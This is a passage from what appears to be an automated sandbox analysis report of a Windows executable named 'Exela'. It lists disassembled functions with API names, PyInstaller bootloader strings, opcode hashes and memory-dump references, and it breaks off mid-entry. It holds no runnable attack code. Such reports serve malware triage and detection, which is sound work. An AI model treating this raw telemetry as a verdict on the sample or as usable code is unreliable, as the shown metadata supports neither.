                                                                                                    • GetProcAddress.KERNEL32(?,00007FF75AE964BF,?,00007FF75AE9336E), ref: 00007FF75AE95987
                                                                                                    • GetLastError.KERNEL32(?,00007FF75AE964BF,?,00007FF75AE9336E), ref: 00007FF75AE95999
                                                                                                    • GetProcAddress.KERNEL32(?,00007FF75AE964BF,?,00007FF75AE9336E), ref: 00007FF75AE959B5
                                                                                                    • GetLastError.KERNEL32(?,00007FF75AE964BF,?,00007FF75AE9336E), ref: 00007FF75AE959C7
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004C.00000002.2109077931.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
                                                                                                    • Associated: 0000004C.00000002.2108988616.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109172912.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AED2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109451009.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_76_2_7ff75ae90000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressErrorLastProc
                                                                                                    • String ID: Failed to get address for %hs$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
                                                                                                    • API String ID: 199729137-653951865
                                                                                                    • Opcode ID: 3ca4f2c8e8fa74ff45c561f9825c8e8d27386d4e804e1314c270c66bff6859f6
                                                                                                    • Instruction ID: 87c2541bdf721b6fcb76899a67c8cdc07f055a2bbc5f468a6bdf870120e1e674
                                                                                                    • Opcode Fuzzy Hash: 3ca4f2c8e8fa74ff45c561f9825c8e8d27386d4e804e1314c270c66bff6859f6
                                                                                                    • Instruction Fuzzy Hash: 9622D924A0DB2FD5FA54BF55A82A574A3A0AF48745FCC92B5C85E12360FF3CB8498331
                                                                                                    Function 00007FF75AE9D19C Relevance: 10.6, APIs: 7, Instructions: 71COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004C.00000002.2109077931.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
                                                                                                    • Associated: 0000004C.00000002.2108988616.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109172912.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AED2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109451009.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_76_2_7ff75ae90000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                    • String ID:
                                                                                                    • API String ID: 3140674995-0
                                                                                                    • Opcode ID: e81d7d82d421bb6c6595da19fcb57285cd54aee8b88ef40036ddb2a35706c3b0
                                                                                                    • Instruction ID: 1c8c1c64a26077d0fd65f62671c78b7cd117953da8f97191762a1f94a6d207b0
                                                                                                    • Opcode Fuzzy Hash: e81d7d82d421bb6c6595da19fcb57285cd54aee8b88ef40036ddb2a35706c3b0
                                                                                                    • Instruction Fuzzy Hash: 99316272608B958AFB60AF64E8857EE7364FB84744F484139DA4D47B94EF38C548C720
                                                                                                    Function 00007FF75AEAA684 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004C.00000002.2109077931.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
                                                                                                    • Associated: 0000004C.00000002.2108988616.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109172912.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AED2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109451009.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_76_2_7ff75ae90000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                    • String ID:
                                                                                                    • API String ID: 1239891234-0
                                                                                                    • Opcode ID: 823e7cd4caae9fc37a1281b2c5c5551f9de180c5e8ac7c275112a8c84bbfd9bf
                                                                                                    • Instruction ID: 2b1ec83d79ad14212572189d2288351226caed0735b322704394a2dd7ad047b1
                                                                                                    • Opcode Fuzzy Hash: 823e7cd4caae9fc37a1281b2c5c5551f9de180c5e8ac7c275112a8c84bbfd9bf
                                                                                                    • Instruction Fuzzy Hash: 5D319432608B918AEB20FF25E8466AEB3A4FF84754F980235EA8D47B54DF3CC545CB10
                                                                                                    Function 00007FF75AEB18E4 Relevance: 7.8, APIs: 5, Instructions: 282COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004C.00000002.2109077931.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
                                                                                                    • Associated: 0000004C.00000002.2108988616.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109172912.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AED2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109451009.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_76_2_7ff75ae90000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileFindFirst_invalid_parameter_noinfo
                                                                                                    • String ID:
                                                                                                    • API String ID: 2227656907-0
                                                                                                    • Opcode ID: 5fde642f47360a120b3bbdc49a752417dcdc94f7dd720a243365bab1f94d45be
                                                                                                    • Instruction ID: da4a6b9407eb0871ddc48659c12e4f25b72625f04edaca1ba97e14f9c10eba7e
                                                                                                    • Opcode Fuzzy Hash: 5fde642f47360a120b3bbdc49a752417dcdc94f7dd720a243365bab1f94d45be
                                                                                                    • Instruction Fuzzy Hash: E3B1CB22B187AA81FA61BB21A94A1B9E3D0EF44BF4F885271DD5D07BC5DE3CE841C710
                                                                                                    Function 00007FF75AE9D080 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004C.00000002.2109077931.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
                                                                                                    • Associated: 0000004C.00000002.2108988616.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109172912.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AED2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109451009.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_76_2_7ff75ae90000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                    • String ID:
                                                                                                    • API String ID: 2933794660-0
                                                                                                    • Opcode ID: c7e0dc91749b0d7e19b464317103f3c41f17e8dff95374d43b780ecdfe6bf67b
                                                                                                    • Instruction ID: 78feb41d75a3293f6ab0b4f41554626afb7dac9ebbe7d0ad77107303d32e2d9b
                                                                                                    • Opcode Fuzzy Hash: c7e0dc91749b0d7e19b464317103f3c41f17e8dff95374d43b780ecdfe6bf67b
                                                                                                    • Instruction Fuzzy Hash: 15119E22B14F158AFB00EF60E8562B873A4FB08718F880E30DA2D427A4DF3CD4548390
                                                                                                    Function 00007FF75AEB34F0 Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004C.00000002.2109077931.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
                                                                                                    • Associated: 0000004C.00000002.2108988616.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109172912.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AED2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109451009.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_76_2_7ff75ae90000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: HeapProcess
                                                                                                    • String ID:
                                                                                                    • API String ID: 54951025-0
                                                                                                    • Opcode ID: 39e33fd4700d97162abc6aa121af668d241eeaeaed41ff08026f27548e358ff0
                                                                                                    • Instruction ID: cbbfddbd36d80d8de1e52f177d6c9af228f59f795a08639a04f07902093c2921
                                                                                                    • Opcode Fuzzy Hash: 39e33fd4700d97162abc6aa121af668d241eeaeaed41ff08026f27548e358ff0
                                                                                                    • Instruction Fuzzy Hash: 73B09220E07B17C2FA483B296C8721862A47F48701FDC42B8C01C40330DE3C28E55720
                                                                                                    Function 00007FF75AEB95E0 Relevance: .0, Instructions: 32COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004C.00000002.2109077931.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
                                                                                                    • Associated: 0000004C.00000002.2108988616.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109172912.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AED2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109451009.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_76_2_7ff75ae90000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: bcf48121633763fd2f6aa1741893fa818c421e56c797f7e3558f0bc07bbc94c0
                                                                                                    • Instruction ID: 26a246e96c8131ed3d0afc302c454ae01ffece39b55d33fa4e6222d56788bb28
                                                                                                    • Opcode Fuzzy Hash: bcf48121633763fd2f6aa1741893fa818c421e56c797f7e3558f0bc07bbc94c0
                                                                                                    • Instruction Fuzzy Hash: A6F068717182668AEBD8AF6DA80362977D0FB483C0F88907DD59D83B14DB3DD4618F14
                                                                                                    Function 00007FF75AE976B0 Relevance: 177.1, APIs: 66, Strings: 35, Instructions: 314libraryloaderCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004C.00000002.2109077931.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
                                                                                                    • Associated: 0000004C.00000002.2108988616.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109172912.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AED2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109451009.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_76_2_7ff75ae90000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressErrorLastProc
                                                                                                    • String ID: Failed to get address for %hs$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_JoinThread$Tcl_MutexFinalize$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
                                                                                                    • API String ID: 199729137-3427451314
                                                                                                    • Opcode ID: 0a662de07e299f73dada83b080b335429a490c7fb48c0bc5bb894b33d2b2cc2e
                                                                                                    • Instruction ID: 6f038cac8090d9ad794c50ebfa696285aead0a04dfa4f2c327d0e77aeb36ffef
                                                                                                    • Opcode Fuzzy Hash: 0a662de07e299f73dada83b080b335429a490c7fb48c0bc5bb894b33d2b2cc2e
                                                                                                    • Instruction Fuzzy Hash: 3702D120D0DB2FD5FA55BB55A86A5B4B3A1BF04755FCC82B5D85E022A0EF3CB958C230
                                                                                                    Function 00007FF75AE981C0 Relevance: 24.6, APIs: 6, Strings: 8, Instructions: 117COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 00007FF75AE99400: MultiByteToWideChar.KERNEL32(?,?,?,00007FF75AE945E4,00000000,00007FF75AE91985), ref: 00007FF75AE99439
                                                                                                    • ExpandEnvironmentStringsW.KERNEL32(?,00007FF75AE988A7,?,?,00000000,00007FF75AE93CBB), ref: 00007FF75AE9821C
                                                                                                      • Part of subcall function 00007FF75AE92810: MessageBoxW.USER32 ref: 00007FF75AE928EA
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004C.00000002.2109077931.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
                                                                                                    • Associated: 0000004C.00000002.2108988616.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109172912.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AED2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109451009.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_76_2_7ff75ae90000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
                                                                                                    • String ID: %.*s$CreateDirectory$LOADER: failed to convert runtime-tmpdir to a wide string.$LOADER: failed to create runtime-tmpdir path %ls!$LOADER: failed to expand environment variables in the runtime-tmpdir.$LOADER: failed to obtain the absolute path of the runtime-tmpdir.$LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!$\
                                                                                                    • API String ID: 1662231829-930877121
                                                                                                    • Opcode ID: e491f33a4545c5dc9e33b4da933e1c9d98f9a36929a11ac7b8a73595df86892f
                                                                                                    • Instruction ID: b3c727132e1073c22a27d9b75de5736c290b2be5e5be49c7d8869525dece91ad
                                                                                                    • Opcode Fuzzy Hash: e491f33a4545c5dc9e33b4da933e1c9d98f9a36929a11ac7b8a73595df86892f
                                                                                                    • Instruction Fuzzy Hash: C651B911A2D76289FB50FB24E857AFAE251EF94780FCC4071D90E826E5EE3CE4048370
                                                                                                    Function 00007FF75AE92180 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 120COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004C.00000002.2109077931.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
                                                                                                    • Associated: 0000004C.00000002.2108988616.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109172912.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AED2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109451009.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_76_2_7ff75ae90000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MoveWindow$ObjectSelect$DrawReleaseText
                                                                                                    • String ID: P%
                                                                                                    • API String ID: 2147705588-2959514604
                                                                                                    • Opcode ID: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
                                                                                                    • Instruction ID: 39a5f2c6087654fef2200ac20c4f8b0fbe47f9aea0077a4a8df99a9ce8acb40a
                                                                                                    • Opcode Fuzzy Hash: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
                                                                                                    • Instruction Fuzzy Hash: 2F5107266147A186E624AF26A4181BAF7A1FB98B61F044131EFDE43694DF3CD485CB20
                                                                                                    Function 00007FF75AE980B0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 67COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004C.00000002.2109077931.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
                                                                                                    • Associated: 0000004C.00000002.2108988616.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109172912.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AED2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109451009.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_76_2_7ff75ae90000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: LongWindow$BlockCreateErrorLastReasonShutdown
                                                                                                    • String ID: Needs to remove its temporary files.
                                                                                                    • API String ID: 3975851968-2863640275
                                                                                                    • Opcode ID: 1b4b32be61da5f45784fe9fe2f7d724fb74bbaf2a32eb33803c40e4204126e7e
                                                                                                    • Instruction ID: 4eb603274be711d307a27c62161d961ef460bc025171df7273a3f674c4d2f085
                                                                                                    • Opcode Fuzzy Hash: 1b4b32be61da5f45784fe9fe2f7d724fb74bbaf2a32eb33803c40e4204126e7e
                                                                                                    • Instruction Fuzzy Hash: 2521A621B08B5685F7457B7AA85A579A750FF88B90F8C82B1DE2D433E4DE2CD9908320
                                                                                                    Function 00007FF75AEA6300 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 494COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004C.00000002.2109077931.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
                                                                                                    • Associated: 0000004C.00000002.2108988616.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109172912.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AED2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109451009.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_76_2_7ff75ae90000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                    • String ID: -$:$f$p$p
                                                                                                    • API String ID: 3215553584-2013873522
                                                                                                    • Opcode ID: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
                                                                                                    • Instruction ID: 166db229d8d4cc03598a5c66062f7565632d8bb059b4aad536d930c1026dbff5
                                                                                                    • Opcode Fuzzy Hash: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
                                                                                                    • Instruction Fuzzy Hash: 5B127F72E0C16386FB207B14D15A679B692FF83754FCC8575E69A4A6C4DF3CE5808B20
                                                                                                    Function 00007FF75AEA1038 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 475COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004C.00000002.2109077931.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
                                                                                                    • Associated: 0000004C.00000002.2108988616.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109172912.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AED2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109451009.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_76_2_7ff75ae90000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                    • String ID: f$f$p$p$f
                                                                                                    • API String ID: 3215553584-1325933183
                                                                                                    • Opcode ID: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
                                                                                                    • Instruction ID: 10f5db7b62dcbf62b8dd2f69dfbe0918851026f79332cf73bfc82000bb508e0e
                                                                                                    • Opcode Fuzzy Hash: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
                                                                                                    • Instruction Fuzzy Hash: A5128222E0C16386FB24BA15E85E6B9F2E1EF80754FCC4075E699879C4DF7CE4849B60
                                                                                                    Function 00007FF75AE91050 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 119COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004C.00000002.2109077931.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
                                                                                                    • Associated: 0000004C.00000002.2108988616.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109172912.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AED2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109451009.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_76_2_7ff75ae90000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CurrentProcess
                                                                                                    • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                    • API String ID: 2050909247-3659356012
                                                                                                    • Opcode ID: 0c31251e6cc82c47abebe2306b4fb6df75d7e9a8de90183b667ac336f21b0774
                                                                                                    • Instruction ID: 31d62027896e3dfc7cd81dfdc4a0153339eb9251aea5c8b9f4146cb427cae2ea
                                                                                                    • Opcode Fuzzy Hash: 0c31251e6cc82c47abebe2306b4fb6df75d7e9a8de90183b667ac336f21b0774
                                                                                                    • Instruction Fuzzy Hash: D4416F21B087729AFA50FB12A806AB9E394BF44BC4FD845B1EE4D07796DF3CE5018760
                                                                                                    Function 00007FF75AE91470 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 107COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004C.00000002.2109077931.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
                                                                                                    • Associated: 0000004C.00000002.2108988616.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109172912.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AED2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109451009.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_76_2_7ff75ae90000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CurrentProcess
                                                                                                    • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                    • API String ID: 2050909247-3659356012
                                                                                                    • Opcode ID: 5a016122ccacf22d2f40e2f4ad7ae1084c068073363954eaa92016f2cfc1e0a1
